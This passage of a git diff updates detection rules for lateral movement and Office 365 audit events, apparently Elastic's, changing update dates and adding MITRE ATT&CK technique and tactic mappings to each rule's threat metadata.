+updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -96,14 +96,23 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating adm - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml index b4d4e4a8ff6..8b470800767 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_remote_file_size.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -96,14 +96,31 @@ Machine learning models in security environments analyze file transfer patterns - Enhance monitoring and logging for unusual file transfer activities and remote access attempts to improve early detection of similar threats in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1039" +name = "Data from Network Shared Drive" +reference = "https://attack.mitre.org/techniques/T1039/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml index bc0292876e8..28673a7b2a5 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_variance_rdp_session_duration.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -96,14 +96,23 @@ Remote Desktop Protocol (RDP) enables remote access to systems, facilitating leg - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml index 04f5ad44500..ea82363e132 100644 --- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml +++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_directory.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -96,14 +96,18 @@ The 'Unusual Remote File Directory' detection leverages machine learning to iden - Update detection mechanisms and rules to enhance monitoring of less common directories and improve the detection of similar threats in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml index 8cc42195af1..60be1f2cb83 100644 --- a/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml +++ b/rules/integrations/lmd/lateral_movement_ml_rare_remote_file_extension.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -95,14 +95,18 @@ The detection of unusual remote file extensions leverages machine learning to id - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml index 027b7598adf..53517117ac2 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_from_a_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -96,14 +96,23 @@ Remote Desktop Protocol (RDP) is a common tool for remote management, but advers - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes, ensuring early detection of future attempts.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml index e511ab60262..fb2dd4c72d8 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_connections_to_a_destination_ip.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -95,14 +95,23 @@ Remote Desktop Protocol (RDP) is crucial for remote management and troubleshooti - Update and enhance monitoring rules to detect similar patterns of unusual RDP connection spikes in the future, ensuring quick identification and response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml index d5bcf1bf496..c39a26c3580 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_rdp_processes.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -94,14 +94,23 @@ Remote Desktop Protocol (RDP) allows users to connect to other computers over a - Enhance monitoring and detection capabilities for RDP sessions by implementing stricter access controls and logging to detect similar anomalies in the future.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml index d66e8ddd4dc..a0665035521 100644 --- a/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml +++ b/rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -97,14 +97,18 @@ Remote file transfer technologies facilitate data sharing across networks, essen - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation efforts are undertaken.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml index be5de02f9db..c989b30fde8 100644 --- a/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml +++ b/rules/integrations/lmd/lateral_movement_ml_unusual_time_for_an_rdp_session.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -96,14 +96,23 @@ Remote Desktop Protocol (RDP) enables remote access to systems, crucial for IT m - Implement enhanced monitoring on the affected system and related network segments to detect any further suspicious activities or attempts at unauthorized access.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml b/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml index 1ad36ca53cc..4883340158d 100644 --- a/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml +++ b/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/18" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -169,22 +169,39 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" + [[rule.threat.technique.subtechnique]] id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["o365.audit.ClientAppId"] diff --git a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml index e79eaca74da..4dda806d2f7 100644 --- a/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml +++ b/rules/integrations/o365/collection_onedrive_excessive_file_downloads.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/19" integration = ["o365"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -150,6 +150,16 @@ reference = "https://attack.mitre.org/tactics/TA0009/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml index f2e5eb1098f..306442c5bcd 100644 --- a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml +++ b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/24" integration = ["o365"] maturity = "production" -updated_date = "2026/02/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,26 +86,27 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" - [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" @@ -114,3 +115,20 @@ id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml index bcad5515b25..a7b3d02a970 100644 --- a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml +++ b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,48 +75,67 @@ sequence by related.user with maxspan=30m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml index 692780a6416..f6a7afa5ec2 100644 --- a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml +++ b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/01" integration = ["o365"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -188,48 +188,59 @@ from logs-o365.audit-* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_anti_phish_policy_deletion.toml b/rules/integrations/o365/defense_evasion_exchange_anti_phish_policy_deletion.toml index c1cad5d40cc..dbdd60ecb75 100644 --- a/rules/integrations/o365/defense_evasion_exchange_anti_phish_policy_deletion.toml +++ b/rules/integrations/o365/defense_evasion_exchange_anti_phish_policy_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -85,18 +85,23 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_dkim_signing_config_disabled.toml b/rules/integrations/o365/defense_evasion_exchange_dkim_signing_config_disabled.toml index 07af6dc660d..004e5b760f0 100644 --- a/rules/integrations/o365/defense_evasion_exchange_dkim_signing_config_disabled.toml +++ b/rules/integrations/o365/defense_evasion_exchange_dkim_signing_config_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,18 +78,23 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml index 8574d32b915..110b2b65dbd 100644 --- a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml +++ b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,11 +80,16 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/integrations/o365/defense_evasion_exchange_exchange_safelinks_disabled.toml b/rules/integrations/o365/defense_evasion_exchange_exchange_safelinks_disabled.toml index 2291a229ffe..ec6089b3a23 100644 --- a/rules/integrations/o365/defense_evasion_exchange_exchange_safelinks_disabled.toml +++ b/rules/integrations/o365/defense_evasion_exchange_exchange_safelinks_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,18 +83,23 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml index 1a63debc029..cb297e6c510 100644 --- a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml +++ b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/13" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -75,10 +75,12 @@ event.dataset:o365.audit and event.provider:Exchange and event.action:Set-Mailbo [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" @@ -89,9 +91,20 @@ id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml index 9b65cad7179..c42fdc66200 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml +++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,14 +84,18 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml index aeb5c15781c..c8313e37974 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml +++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,14 +83,23 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/o365/defense_evasion_exchange_new_inbox_rule_delete_or_move.toml b/rules/integrations/o365/defense_evasion_exchange_new_inbox_rule_delete_or_move.toml index 146cb01f008..b902db463ca 100644 --- a/rules/integrations/o365/defense_evasion_exchange_new_inbox_rule_delete_or_move.toml +++ b/rules/integrations/o365/defense_evasion_exchange_new_inbox_rule_delete_or_move.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/22" integration = ["o365"] maturity = "production" -updated_date = "2026/01/29" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Jamie Lee", "Marco Pedrinazzi"] @@ -119,22 +119,39 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.008" name = "Email Hiding Rules" reference = "https://attack.mitre.org/techniques/T1564/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1137" +name = "Office Application Startup" +reference = "https://attack.mitre.org/techniques/T1137/" + +[[rule.threat.technique.subtechnique]] +id = "T1137.005" +name = "Outlook Rules" +reference = "https://attack.mitre.org/techniques/T1137/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["user.id", "source.ip"] diff --git a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml 